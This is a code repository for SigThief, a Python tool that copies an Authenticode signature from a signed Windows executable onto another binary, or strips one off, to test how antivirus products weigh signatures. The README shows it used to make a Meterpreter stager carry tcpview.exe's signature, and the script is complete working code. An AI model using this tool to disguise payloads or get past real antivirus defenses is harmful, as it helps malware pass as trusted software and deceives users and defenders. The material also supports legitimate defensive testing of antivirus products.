├── .github
    └── FUNDING.yml
├── LICENSE
├── README.md
└── sigthief.py


/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | # These are supported funding model platforms
2 | 
3 | github: [secretsquirrel]
4 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | BSD 3-Clause License
 2 | 
 3 | Copyright (c) 2017, Josh Pitts
 4 | All rights reserved.
 5 | 
 6 | Redistribution and use in source and binary forms, with or without
 7 | modification, are permitted provided that the following conditions are met:
 8 | 
 9 | * Redistributions of source code must retain the above copyright notice, this
10 |   list of conditions and the following disclaimer.
11 | 
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 |   this list of conditions and the following disclaimer in the documentation
14 |   and/or other materials provided with the distribution.
15 | 
16 | * Neither the name of the copyright holder nor the names of its
17 |   contributors may be used to endorse or promote products derived from
18 |   this software without specific prior written permission.
19 | 
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # SigThief
 2 | 
 3 | New version available to Dev-tier sponsors: https://github.com/sponsors/secretsquirrel
 4 | 
 5 | Stable tier will have it End of Month August 2021
 6 | 
 7 | ---
 8 | Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this:
 9 | https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)
10 | 
11 | https://twitter.com/subTee/status/912769644473098240
12 | ![alt text](https://i.imgur.com/T05kwwn.png "https://twitter.com/subTee/status/912769644473098240")
13 | 
14 | ## For security professionals only...
15 | 
16 | ## What is this?
17 | 
18 | I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.
19 | 
20 | So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not. 
21 | 
22 | In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file. 
23 | 
24 | Of course it's **not a valid signature** and that's the point!
25 | 
26 | I look forward to hearing about your results!
27 | 
28 | 
29 | ## How to use
30 | 
31 | ### Usage
32 | ```
33 | Usage: sigthief.py [options]
34 | 
35 | Options:
36 |   -h, --help            show this help message and exit
37 |   -i FILE, --file=FILE  input file
38 |   -r, --rip             rip signature off inputfile
39 |   -a, --add             add signautre to targetfile
40 |   -o OUTPUTFILE, --output=OUTPUTFILE
41 |                         output file
42 |   -s SIGFILE, --sig=SIGFILE
43 |                         binary signature from disk
44 |   -t TARGETFILE, --target=TARGETFILE
45 |                         file to append signature too
46 |   -c, --checksig        file to check if signed; does not verify signature
47 |   -T, --truncate        truncate signature (i.e. remove sig)
48 | ```
49 | 
50 | ### Take a Signature from a binary and add it to another binary
51 | ```
52 | $ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
53 | Output file: /tmp/msftesting_tcpview.exe
54 | Signature appended. 
55 | FIN.
56 | ```
57 | 
58 | ### Save Signature to disk for use later
59 | ```
60 | $ ./sigthief.py -i tcpview.exe -r                                                        
61 | Ripping signature to file!
62 | Output file: tcpview.exe_sig
63 | Signature ripped. 
64 | FIN.
65 | 
66 | ```
67 | 
68 | ### Use the ripped signature
69 | ```
70 | $ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
71 | Output file: x86_meterpreter_stager.exe_signed
72 | Signature appended. 
73 | FIN.
74 | 
75 | ```
76 | 
77 | ### Truncate (remove) signature
78 | This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)
79 | 
80 | ```
81 | $ ./sigthief.py -i tcpview.exe -T    
82 | Inputfile is signed!
83 | Output file: tcpview.exe_nosig
84 | Overwriting certificate table pointer and truncating binary
85 | Signature removed. 
86 | FIN.
87 | ```
88 | 
89 | ### Check if there is a signature (does not check validity)
90 | ```
91 | $ ./sigthief.py -i tcpview.exe -c
92 | Inputfile is signed!
93 | ```
94 | 


--------------------------------------------------------------------------------
/sigthief.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | # LICENSE: BSD-3
  3 | # Copyright: Josh Pitts @midnite_runr
  4 | 
  5 | import sys
  6 | import struct
  7 | import shutil
  8 | import io
  9 | from optparse import OptionParser
 10 | 
 11 | 
 12 | def gather_file_info_win(binary):
 13 |         """
 14 |         Borrowed from BDF...
 15 |         I could just skip to certLOC... *shrug*
 16 |         """
 17 |         flItms = {}
 18 |         binary = open(binary, 'rb')
 19 |         binary.seek(int('3C', 16))
 20 |         flItms['buffer'] = 0
 21 |         flItms['JMPtoCodeAddress'] = 0
 22 |         flItms['dis_frm_pehdrs_sectble'] = 248
 23 |         flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
 24 |         # Start of COFF
 25 |         flItms['COFF_Start'] = flItms['pe_header_location'] + 4
 26 |         binary.seek(flItms['COFF_Start'])
 27 |         flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
 28 |         binary.seek(flItms['COFF_Start'] + 2, 0)
 29 |         flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
 30 |         flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
 31 |         binary.seek(flItms['COFF_Start'] + 16, 0)
 32 |         flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
 33 |         flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
 34 |         #End of COFF
 35 |         flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
 36 | 
 37 |         #if flItms['SizeOfOptionalHeader']:
 38 |             #Begin Standard Fields section of Optional Header
 39 |         binary.seek(flItms['OptionalHeader_start'])
 40 |         flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
 41 |         flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
 42 |         flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
 43 |         flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
 44 |         flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
 45 |         flItms['SizeOfUninitializedData'] = struct.unpack("<I",
 46 |                                                                binary.read(4))[0]
 47 |         flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
 48 |         flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
 49 |         flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
 50 |         if flItms['Magic'] != 0x20B:
 51 |             flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
 52 |         # End Standard Fields section of Optional Header
 53 |         # Begin Windows-Specific Fields of Optional Header
 54 |         if flItms['Magic'] == 0x20B:
 55 |             flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
 56 |         else:
 57 |             flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
 58 |         flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
 59 |         flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
 60 |         flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
 61 |                                                                    binary.read(2))[0]
 62 |         flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
 63 |                                                                    binary.read(2))[0]
 64 |         flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
 65 |         flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
 66 |         flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
 67 |         flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
 68 |         flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
 69 |         flItms['SizeOfImageLoc'] = binary.tell()
 70 |         flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
 71 |         flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
 72 |         flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
 73 |         flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
 74 |         flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
 75 |         if flItms['Magic'] == 0x20B:
 76 |             flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
 77 |             flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
 78 |             flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
 79 |             flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
 80 | 
 81 |         else:
 82 |             flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
 83 |             flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
 84 |             flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
 85 |             flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
 86 |         flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
 87 |         flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
 88 |         # End Windows-Specific Fields of Optional Header
 89 |         # Begin Data Directories of Optional Header
 90 |         flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
 91 |         flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
 92 |         flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
 93 |         #ImportTable SIZE|LOC
 94 |         flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
 95 |         flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
 96 |         flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
 97 |         flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
 98 |         flItms['CertTableLOC'] = binary.tell()
 99 |         flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
100 |         flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
101 |         binary.close()
102 |         return flItms
103 | 
104 | 
105 | def copyCert(exe):
106 |     flItms = gather_file_info_win(exe)
107 | 
108 |     if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
109 |         # not signed
110 |         print("Input file Not signed!")
111 |         sys.exit(-1)
112 | 
113 |     with open(exe, 'rb') as f:
114 |         f.seek(flItms['CertLOC'], 0)
115 |         cert = f.read(flItms['CertSize'])
116 |     return cert
117 | 
118 | 
119 | def writeCert(cert, exe, output):
120 |     flItms = gather_file_info_win(exe)
121 |     
122 |     if not output: 
123 |         output = output = str(exe) + "_signed"
124 | 
125 |     shutil.copy2(exe, output)
126 |     
127 |     print("Output file: {0}".format(output))
128 | 
129 |     with open(exe, 'rb') as g:
130 |         with open(output, 'wb') as f:
131 |             f.write(g.read())
132 |             f.seek(0)
133 |             f.seek(flItms['CertTableLOC'], 0)
134 |             f.write(struct.pack("<I", len(open(exe, 'rb').read())))
135 |             f.write(struct.pack("<I", len(cert)))
136 |             f.seek(0, io.SEEK_END)
137 |             f.write(cert)
138 | 
139 |     print("Signature appended. \nFIN.")
140 | 
141 | 
142 | def outputCert(exe, output):
143 |     cert = copyCert(exe)
144 |     if not output:
145 |         output = str(exe) + "_sig"
146 | 
147 |     print("Output file: {0}".format(output))
148 | 
149 |     open(output, 'wb').write(cert)
150 | 
151 |     print("Signature ripped. \nFIN.")
152 | 
153 | 
154 | def check_sig(exe):
155 |     flItms = gather_file_info_win(exe)
156 |  
157 |     if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
158 |         # not signed
159 |         print("Inputfile Not signed!")
160 |     else:
161 |         print("Inputfile is signed!")
162 | 
163 | 
164 | def truncate(exe, output):
165 |     flItms = gather_file_info_win(exe)
166 |  
167 |     if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
168 |         # not signed
169 |         print("Inputfile Not signed!")
170 |         sys.exit(-1)
171 |     else:
172 |         print( "Inputfile is signed!")
173 | 
174 |     if not output:
175 |         output = str(exe) + "_nosig"
176 | 
177 |     print("Output file: {0}".format(output))
178 | 
179 |     shutil.copy2(exe, output)
180 | 
181 |     with open(output, "r+b") as binary:
182 |         print('Overwriting certificate table pointer and truncating binary')
183 |         binary.seek(-flItms['CertSize'], io.SEEK_END)
184 |         binary.truncate()
185 |         binary.seek(flItms['CertTableLOC'], 0)
186 |         binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
187 | 
188 |     print("Signature removed. \nFIN.")
189 | 
190 | 
191 | def signfile(exe, sigfile, output):
192 |     flItms = gather_file_info_win(exe)
193 |     
194 |     cert = open(sigfile, 'rb').read()
195 | 
196 |     if not output: 
197 |         output = output = str(exe) + "_signed"
198 | 
199 |     shutil.copy2(exe, output)
200 |     
201 |     print("Output file: {0}".format(output))
202 |     
203 |     with open(exe, 'rb') as g:
204 |         with open(output, 'wb') as f:
205 |             f.write(g.read())
206 |             f.seek(0)
207 |             f.seek(flItms['CertTableLOC'], 0)
208 |             f.write(struct.pack("<I", len(open(exe, 'rb').read())))
209 |             f.write(struct.pack("<I", len(cert)))
210 |             f.seek(0, io.SEEK_END)
211 |             f.write(cert)
212 |     print("Signature appended. \nFIN.")
213 | 
214 | 
215 | if __name__ == "__main__":
216 |     usage = 'usage: %prog [options]'
217 |     print("\n\n!! New Version available now for Dev Tier Sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel\n\n")
218 |     parser = OptionParser()
219 |     parser.add_option("-i", "--file", dest="inputfile", 
220 |                   help="input file", metavar="FILE")
221 |     parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
222 |                   help='rip signature off inputfile')
223 |     parser.add_option('-a', '--add', dest='addsig', action='store_true',
224 |                   help='add signautre to targetfile')
225 |     parser.add_option('-o', '--output', dest='outputfile',
226 |                   help='output file')
227 |     parser.add_option('-s', '--sig', dest='sigfile',
228 |                   help='binary signature from disk')
229 |     parser.add_option('-t', '--target', dest='targetfile',
230 |                   help='file to append signature to')
231 |     parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
232 |                   help='file to check if signed; does not verify signature')
233 |     parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
234 |                   help='truncate signature (i.e. remove sig)')
235 |     (options, args) = parser.parse_args()
236 |     
237 |     # rip signature
238 |     # inputfile and rip to outputfile
239 |     if options.inputfile and options.ripsig:
240 |         print("Ripping signature to file!")
241 |         outputCert(options.inputfile, options.outputfile)
242 |         sys.exit()    
243 | 
244 |     # copy from one to another
245 |     # inputfile and rip to targetfile to outputfile    
246 |     if options.inputfile and options.targetfile:
247 |         cert = copyCert(options.inputfile)
248 |         writeCert(cert, options.targetfile, options.outputfile)
249 |         sys.exit()
250 | 
251 |     # check signature
252 |     # inputfile 
253 |     if options.inputfile and options.checksig:
254 |         check_sig(options.inputfile) 
255 |         sys.exit()
256 | 
257 |     # add sig to target file
258 |     if options.targetfile and options.sigfile:
259 |         signfile(options.targetfile, options.sigfile, options.outputfile)
260 |         sys.exit()
261 |         
262 |     # truncate
263 |     if options.inputfile and options.truncate:
264 |         truncate(options.inputfile, options.outputfile)
265 |         sys.exit()
266 | 
267 |     parser.print_help()
268 |     parser.error("You must do something!")
269 | 
270 | 


--------------------------------------------------------------------------------